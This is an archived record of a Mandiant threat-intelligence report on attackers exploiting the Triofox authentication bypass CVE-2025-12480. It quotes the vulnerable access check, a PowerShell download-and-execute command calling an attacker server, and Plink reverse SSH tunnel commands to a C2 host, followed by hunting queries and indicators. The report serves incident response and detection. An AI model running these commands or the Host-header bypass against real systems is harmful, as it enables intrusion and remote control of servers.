{
	"id": "17497973-ca74-4376-b8e2-c633878d9fb7",
	"created_at": "2026-04-06T00:09:33.815532Z",
	"updated_at": "2026-04-10T03:36:00.772067Z",
	"deleted_at": null,
	"sha1_hash": "73bcbb22ae3ebff753793f265be0a0e60bf33b67",
	"title": "Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 846044,
	"plain_text": "Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-\r\n12480\r\nBy Mandiant\r\nPublished: 2025-11-10 · Archived: 2026-04-05 14:42:00 UTC\r\nWritten by: Stallone D'Souza, Praveeth DSouza, Bill Glynn, Kevin O'Flynn, Yash Gupta\r\nWelcome to the Frontline Bulletin Series\r\nStraight from Mandiant Threat Defense, the \"Frontline Bulletin\" series brings you the latest on the threats we are seeing in\r\nthe wild right now, equipping our community to understand and respond. \r\nIntroduction\r\nMandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox\r\nfile-sharing and remote access platform. This now-patched n-day vulnerability, assigned CVE-2025-12480, allowed an\r\nattacker to bypass authentication and access the application configuration pages, enabling the upload and execution of\r\narbitrary payloads. \r\nAs early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the\r\nunauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code\r\nexecution. \r\nThe activity discussed in this blog post leveraged a vulnerability in Triofox version 16.4.10317.56372, which was mitigated\r\nin release 16.7.10368.56560.\r\nGladinet engaged with Mandiant on our findings, and Mandiant has validated that this vulnerability is resolved in new\r\nversions of Triofox.\r\nInitial Detection\r\nMandiant leverages Google Security Operations (SecOps) for detecting, investigating, and responding to security incidents\r\nacross our customer base. As part of Google Cloud Security’s Shared Fate model, SecOps provides out-of-the-box detection\r\ncontent designed to help customers identify threats to their enterprise. Mandiant uses SecOps’ composite detection\r\nfunctionality to enhance our detection posture by correlating the outputs from multiple rules.\r\nFor this investigation, Mandiant received a composite detection alert identifying potential threat actor activity on a\r\ncustomer's Triofox server. The alert identified the deployment and use of remote access utilities (using PLINK to tunnel\r\nRDP externally) and file activity in potential staging directories (file downloads to C:\\WINDOWS\\Temp ).\r\nWithin 16 minutes of beginning the investigation, Mandiant confirmed the threat and initiated containment of the host. The\r\ninvestigation revealed an unauthenticated access vulnerability that allowed access to configuration pages. UNC6485 used\r\nthese pages to run the initial Triofox setup process to create a new native admin account, Cluster Admin , and used this\r\naccount to conduct subsequent activities.\r\nTriofox Unauthenticated Access Control Vulnerability\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 1 of 8\n\nFigure 1: CVE-2025-12480 exploitation chain\r\nDuring the Mandiant investigation, we identified an anomalous entry in the HTTP log file - a suspicious HTTP GET request\r\nwith an HTTP Referer URL containing localhost . The presence of the localhost host header in a request originating\r\nfrom an external source is highly irregular and typically not expected in legitimate traffic.\r\nGET /management/CommitPage.aspx - 443 - 85.239.63[.]37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTM\r\nFigure 2: HTTP log entry\r\nWithin a test environment, Mandiant noted that standard HTTP requests issued to AdminAccount.aspx result in a redirect to\r\nthe Access Denied page, indicative of access controls being in place on the page.\r\nFigure 3: Redirection to AccessDenied.aspx when attempting to browse AdminAccount.aspx\r\nAccess to the AdminAccount.aspx page is granted as part of setup from the initial configuration page at\r\nAdminDatabase.aspx . The AdminDatabase.aspx page is automatically launched after first installing the Triofox software.\r\nThis page allows the user to set up the Triofox instance, with options such as database selection (Postgres or MySQL),\r\nconnecting LDAP accounts, or creating a new native cluster admin account, in addition to other details.\r\nAttempts to browse to the AdminDatabase.aspx page resulted in a similar redirect to the Access Denied page.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 2 of 8\n\nFigure 4: Redirection to AccessDenied.aspx when attempting to browse AdminDatabase.aspx\r\nMandiant validated the vulnerability by testing the workflow of the setup process. The Host header field is provided by the\r\nweb client and can be easily modified by an attacker. This technique is referred to as an HTTP host header attack. Changing\r\nthe Host value to localhost grants access to the AdminDatabase.aspx page.\r\nFigure 5: Access granted to AdminDatabase.aspx by changing Host header to localhost\r\nBy following the setup process and creating a new database via the AdminDatabase.aspx page, access is granted to the\r\nadmin initialization page, AdminAccount.aspx , which then redirects to the InitAccount.aspx page to create a new admin\r\naccount.\r\nFigure 6: Successful access to the AdminCreation page InitAccount.aspx\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 3 of 8\n\nAnalysis of the code base revealed that the main access control check to the AdminDatabase.aspx page is controlled by the\r\nfunction CanRunCrticalPage() ,  located within the GladPageUILib.GladBasePage class found in C:\\Program Files\r\n(x86)\\Triofox\\portal\\bin\\GladPageUILib.dll .\r\npublic bool CanRunCriticalPage()\r\n{\r\n Uri url = base.Request.Url;\r\n string host = url.Host;\r\n bool flag = string.Compare(host, \"localhost\", true) == 0; //Access to the page is granted if Request.Url.Host equals '\r\n bool result;\r\n if (flag)\r\n {\r\n result = true;\r\n }\r\n else\r\n {\r\n //Check for a pre-configured trusted IP in the web.config file. If configured, compare the client IP with the trust\r\n \r\nstring text = ConfigurationManager.AppSettings[\"TrustedHostIp\"];\r\n bool flag2 = string.IsNullOrEmpty(text);\r\n if (flag2)\r\n {\r\n result = false;\r\n }\r\n else\r\n {\r\n string ipaddress = this.GetIPAddress();\r\n bool flag3 = string.IsNullOrEmpty(ipaddress);\r\n if (flag3)\r\n {\r\n result = false;\r\n }\r\n else\r\n ...\r\n \r\nFigure 8: Vulnerable code in the function CanRunCrticalPage()  \r\nAs noted in the code snippet, the code presents several vulnerabilities:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 4 of 8\n\nHost Header attack - ASP.NET builds Request.Url from the HTTP Host header, which can be modified by an\r\nattacker.\r\nNo Origin Validation - No check for whether the request came from an actual localhost connection versus a\r\nspoofed header.\r\nConfiguration Dependence - If TrustedHostIP isn't configured, the only protection is the Host header check.\r\nTriofox Anti-Virus Feature Abuse\r\nTo achieve code execution, the attacker logged in using the newly created Admin account. The attacker uploaded malicious\r\nfiles to execute them using the built-in anti-virus feature. To set up the anti-virus feature, the user is allowed to provide an\r\narbitrary path for the selected anti-virus. The file configured as the anti-virus scanner location inherits the Triofox parent\r\nprocess account privileges, running under the context of the SYSTEM account.\r\nThe attacker was able to run their malicious batch script by configuring the path of the anti-virus engine to point to their\r\nscript. The folder path on disk of any shared folder is displayed when publishing a new share within the Triofox application.\r\nThen, by uploading an arbitrary file to any published share within the Triofox instance, the configured script will be\r\nexecuted.\r\nFigure 9: Anti-virus engine path set to a malicious batch script\r\nSecOps telemetry recorded the following command-line execution of the attacker script:\r\nC:\\Windows\\system32\\cmd.exe /c \"\"c:\\triofox\\centre_report.bat\" C:\\Windows\\TEMP\\eset_temp\\ESET638946159761752413.av\"\r\nPost-Exploitation Activity\r\nFigure 10: Overview of the post-exploitation activity\r\nSupport Tools Deployment\r\nThe attacker script centre_report.bat executed the following PowerShell command to download and execute a second-stage payload:\r\npowershell -NoProfile -ExecutionPolicy Bypass -Command \"$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.z\r\nThe PowerShell downloader was designed to:\r\nDownload a payload from http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip , which hosted a\r\ndisguised executable despite the ZIP extension\r\nSave the payload to: C:\\Windows\\appcompat\\SAgentInstaller_16.7.10368.56560.exe\r\nExecute the payload silently\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 5 of 8\n\nThe executed payload was a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer.\r\nThe attacker used the UEMS agent to then deploy the Zoho Assist and Anydesk remote access utilities on the host.\r\nReconnaissance and Privilege Escalation\r\nThe attacker used Zoho Assist to run various commands to enumerate active SMB sessions and specific local and domain\r\nuser information. \r\nAdditionally, they attempted to change passwords for existing accounts and add the accounts to the local administrators and\r\nthe “Domain Admins” group.\r\nDefense Evasion\r\nThe attacker downloaded sihosts.exe and silcon.exe (sourced from the legitimate domain the.earth[.]li ) into the\r\ndirectory C:\\windows\\temp\\ .\r\nFilename  Original Filename Description\r\nsihosts.exe Plink (PuTTY Link) A common command-line utility for creating SSH connections\r\nsilcon.exe PuTTY A SSH and telnet client\r\nThese tools were used to set up an encrypted tunnel, connecting the compromised host to their command-and-control (C2 or\r\nC\u0026C) server over port 433 via SSH. The C2 server could then forward all traffic over the tunnel to the compromised host\r\non port 3389, allowing inbound RDP traffic. The commands were run with the following parameters:\r\nC:\\windows\\temp\\sihosts.exe -batch -hostkey \"ssh-rsa 2048 SHA256:\u003cREDACTED\u003e\" -ssh -P 433 -l \u003cREDACTED\u003e -pw \u003cREDACTED\u003e -R\r\nC:\\windows\\temp\\silcon.exe -ssh -P 433 -l \u003cREDACTED\u003e -pw \u003cREDACTED\u003e-R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.\r\nConclusion\r\nWhile this vulnerability is patched in the Triofox version 16.7.10368.56560 , Mandiant recommends upgrading to the latest\r\nrelease. In addition, Mandiant recommends auditing admin accounts, and verifying that Triofox’s Anti-virus Engine is not\r\nconfigured to execute unauthorized scripts or binaries. Security teams should also hunt for attacker tools using our hunting\r\nqueries listed at the bottom of this post, and monitor for anomalous outbound SSH traffic. \r\nAcknowledgements\r\nSpecial thanks to Elvis Miezitis, Chris Pickett, Moritz Raabe, Angelo Del Rosario, and Lampros Noutsos\r\nDetection Through Google SecOps\r\nGoogle SecOps customers have access to these broad category rules and more under the Mandiant Windows Threats  rule\r\npack. The activity discussed in the blog post is detected in Google SecOps under the rule names:\r\nGladinet or Triofox IIS Worker Spawns CMD\r\nGladinet or Triofox Suspicious File or Directory Activity\r\nGladinet Cloudmonitor Launches Suspicious Child Process\r\nPowershell Download and Execute\r\nFile Writes To AppCompat\r\nSuspicious Renamed Anydesk Install\r\nSuspicious Activity In Triofox Directory\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 6 of 8\n\nSuspicious Execution From Appcompat\r\nRDP Protocol Over SSH Reverse Tunnel Methodology\r\nPlink EXE Tunneler\r\nNet User Domain Enumeration\r\nSecOps Hunting Queries\r\nThe following UDM queries can be used to identify potential compromises within your environment.\r\nGladinetCloudMonitor.exe Spawns Windows Command Shell\r\nIdentify the legitimate GladinetCloudMonitor.exe process spawning a Windows Command Shell.\r\nmetadata.event_type = \"PROCESS_LAUNCH\"\r\nprincipal.process.file.full_path = /GladinetCloudMonitor\\.exe/ nocase\r\ntarget.process.file.full_path = /cmd\\.exe/ nocase\r\nUtility Execution\r\nIdentify the execution of a renamed Plink executable (sihosts.exe) or a renamed PuTTy executable (silcon.exe) attempting to\r\nestablish a reverse SSH tunnel.\r\nmetadata.event_type = \"PROCESS_LAUNCH\"\r\ntarget.process.command_line = /-R\\b/\r\n(\r\ntarget.process.file.full_path = /(silcon\\.exe|sihosts\\.exe)/ nocase or\r\n(target.process.file.sha256 = \"50479953865b30775056441b10fdcb984126ba4f98af4f64756902a807b453e7\" and target.process.file.f\r\n(target.process.file.sha256 = \"16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b25a90837f28ad\" and target.process.file.f\r\n)\r\nArtifact Description SHA-256 Hash\r\nC:\\Windows\\appcompat\\SAgentInstaller_16.7.10368.56560.exe\r\nInstaller\r\ncontaining\r\nZoho\r\nUEMS\r\nAgent\r\n43c455274d41e58132be7f66139566a941190ceba46082eb2ad7\r\nC:\\Windows\\temp\\sihosts.exe Plink 50479953865b30775056441b10fdcb984126ba4f98af4f647569\r\nC:\\Windows\\temp\\silcon.exe PuTTy 16cbe40fb24ce2d422afddb5a90a5801ced32ef52c22c2fc77b2\r\nC:\\Windows\\temp\\file.exe AnyDesk ac7f226bdf1c6750afa6a03da2b483eee2ef02cd9c2d6af71ea7\r\nC:\\triofox\\centre_report.bat\r\nAttacker\r\nbatch script\r\nfilename\r\nN/A\r\nNetwork-Based Artifacts\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 7 of 8\n\nIP Address ASN Description\r\n85.239.63[.]37\r\nAS62240 -\r\nClouvider Limited\r\nIP address of the attacker used to initially exploit CVE-2025-12480 to\r\ncreate the admin account and gain access to the Triofox instance\r\n65.109.204[.]197\r\nAS24950 - Hetzner\r\nOnline GmbH\r\nAfter a dormant period, the threat actor used this IP address to login\r\nback into the Triofox instance and carry out subsequent activities\r\n84.200.80[.]252\r\nAS214036 -\r\nUltahost, Inc.\r\nIP address hosting the installer for the Zoho UEMSAgent remote\r\naccess tool\r\n216.107.136[.]46\r\nAS396356 -\r\nLATITUDE-SH\r\nPlink C2\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480"
	],
	"report_names": [
		"triofox-vulnerability-cve-2025-12480"
	],
	"threat_actors": [
		{
			"id": "6755ec1a-7731-4723-b27a-9cd062438f1b",
			"created_at": "2026-01-20T02:00:03.663809Z",
			"updated_at": "2026-04-10T02:00:03.913995Z",
			"deleted_at": null,
			"main_name": "UNC6485",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6485",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434173,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/73bcbb22ae3ebff753793f265be0a0e60bf33b67.pdf",
		"text": "https://archive.orkl.eu/73bcbb22ae3ebff753793f265be0a0e60bf33b67.txt",
		"img": "https://archive.orkl.eu/73bcbb22ae3ebff753793f265be0a0e60bf33b67.jpg"
	}
}